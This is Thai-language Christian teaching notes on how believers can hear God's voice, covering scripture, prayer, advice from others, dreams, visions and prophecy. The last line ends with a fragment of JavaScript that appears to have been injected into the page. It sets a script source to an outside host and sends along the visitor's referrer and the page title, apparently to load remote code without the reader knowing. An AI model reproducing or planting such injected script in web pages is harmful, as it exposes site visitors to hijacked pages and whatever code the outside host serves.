การฟังเสียงพระเจ้า

q

15 ต.ค. การฟังเสียงพระเจ้า

หนึ่ง ทำไมต้องฟังเสียงพระเจ้า

มีบางเรื่องที่พระเจ้าอยากทำแต่ เราไม่อยากทำ เช่น เปาโลอยากประกาศกับตนยิว ตายเพื่อยิว เเต่พระเจ้าใช้ท่านไปประกาศกับคนต่างชาติ จึงให้ชาวมาซิโดเนียมาเข้าฝัน เปาโล ให้ท่านไปประกาศกับชาวมาซิโดเนีย แต่เปรโตรอยากประกาศกับต่างชาติ แต่พระเจ้ากลับให้ท่าน ไปประกาศกับคนยิว นั่นแหละคือ ที่มาของการฟังเสียง และการเชื่อฟัง ของพระเจ้า เพื่อเราจะได้ ไม่เสียเวลา กับเรื่องบางเรื่อง ที่ดูเล็กๆน้อยๆแต่ ทำให้เราเสียเวลาทั้งชีวิต เราอาจคิดว่าเราไม่ได้ทำเรื่องที่ผิด แต่เราไม่ได้ทำสิ่งที่ถูก ในสิ่งที่พระเจ้าต้องการ กำหนด ให้เราทำ

สอง ความจำเป็นที่ต้องฟังเสียงพระเจ้า

1.เราเป็น ภาชนะที่พระเจ้าตรัส เพราะเราแกะ เป็นลูกของพระองค์

• ทุกคนทำได้ พระเยซูตรัสว่าแกะของเราย่อมได้ยินเสียงของเรา ยน10 แกะของเรารู้จักเสียงของเรา คุณเป็นแกะหรือเปล่า คุณต้องฟัง

2.เราจะฟังเสียงพระเจ้าได้ผ่านการฝึกหัด
• สังเกตุ พระจ้าตรัส กับซามูเอล ทั้งที่เอลีก็ปรนนิบัติในวิหารแต่ทำไมไม่ได้ยิน ไม่ใช่ทุกคน จะได้ยินและ สนใจจะได้ยินด้วยเช่นกัน

3.พระเจ้าจะช่วยเราฟังเสียงพระองค์ผ่านพระวิญญาณ
• เริ่มต้น ซาตานหว่านเมล็ด ความสงสัย หรือเราหว่านเสียงอะไรภายในวิญญาณเรามาก มันจะเจริญเติบโตขึ่นมา เหมื่อนกัน ตั้งแต่สวน เอเดนจนปัจจุบันก็เหมือนเดิม มารหว่านเสียงสงสัย แต่พระคริสตร์มาตรัสกับเรา เสียงที่ตรัส ผ่าน ความคิด ในใจ จิตสำนึก เป็นเสียงของเรา เองเพราะเรา เป็นวิหารพระเจ้า 1คร6:19 เราควรสนใจเสียงนั้น เช่นกัน เพื่อทำตามน้ำพระทัยพระองค์

4. เพราะพระเจ้าต้องการคุยกับเรา 2คร13:14 การสามัคคีธรรม
• ผู้รับใช้ในอดีตล้วนเป็นคนที่สื่อสารสนทนากับพระเจ้า อับราฮัม อาดัม โมเสส ดาวิด พระคริสต์บอก เราไม่ใช่บ่าวแต่เป็นสหาย พระเจ้าต้องการบอกให้เรารู้ สามัคคีธรรมกับเรา

สาม ระดับการฟังเสียงสามระดับ

1)พระคำ

• ผ่าน พระคำที่ประทับใจ หรืออ่านๆๆๆจนกว่าจะได้รับ การตรัส
• คือการเฝ้าเดี่ยวและบันทึก การสังเกต และจำบันทึก

2)พระวิญญาณ อธิษฐานสนทนา ฟัง ถาม คุย
ผ่านช่วงเวลา การสงบฟังเสียงพระเจ้า นั่งรอ จนกว่าจะจะมีถ้อยคำ สั้นๆ หรือภาพ เราควร มีเวลา นั่งสงบ ฟัง ทุกวัน

3) สถาณการณ์ที่เตือน ซ้ำๆ จากหลายเหตุการณ์

3.1)เสียงคนรอบข้าง ถ้อยคำ พ่อแม่ พี่น้อง เพื่อนร่วมงาน
3.2)คำพูด หรือ เหตุการณ์ ซ้ำๆ
3.3)การให้คำปรึกษา จาก พี่เลี้ยง ผู้ไหญ่ฝ่ายวิญฯ
3.4)ผ่านคำเทศนา การเรียน ถ้อยคำจากรอบข้าง ถามพระเจ้าถ้อยคำ ประโยคเดียว ก็มีค่า มากมาย
3.5)ให้พระเจ้าใช้ทุกอย่างในร่างกาย
ก) รู้สึก ถาระในใจ
ข).การมองเห็นผ่านคนอื่น
ค)จิตใต้สำนึก
ง) ถ้อยคำสั้นๆ ในความคิด
จ) ความฝัน
ฉ)การมองเห็น ผ่านความคิด

4)จากการ กระทำ ที่ปกติ ดำเนินชีวิตประจำวัน มาเป็นบทเรียนชีวิต
เช่น หากท่าน การออกกำลังกายเป็นประจำ การมีวินัยฝ่ายวิญญาณก็จะทำให้ท่านเจริญเติบโตขึ่นได้เช่นกัน

5 )นิมิตร ความฝัน

5.1)นิมิตรเกิดขึ่นยามตื่น และรู้สึกตัว
5.2)ความฝันเกิดยาม หลับ ท่านจะไม่รู้สึกตัวแต่จิตใต้สำนึกทำงาน
• ไม่ใช่ทุกฝันมาจากพระเจ้า เป็นไปได้ ที่ทุกคนฝันทุกคน แต่บางฝัน มาจากพระเจ้า ขอให้สังเกตุและบันทีก ค่อยเรียน วิชานี้อีกที

6.ผ่านทางคำเผยวจนะ ในคริสตจักรs.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;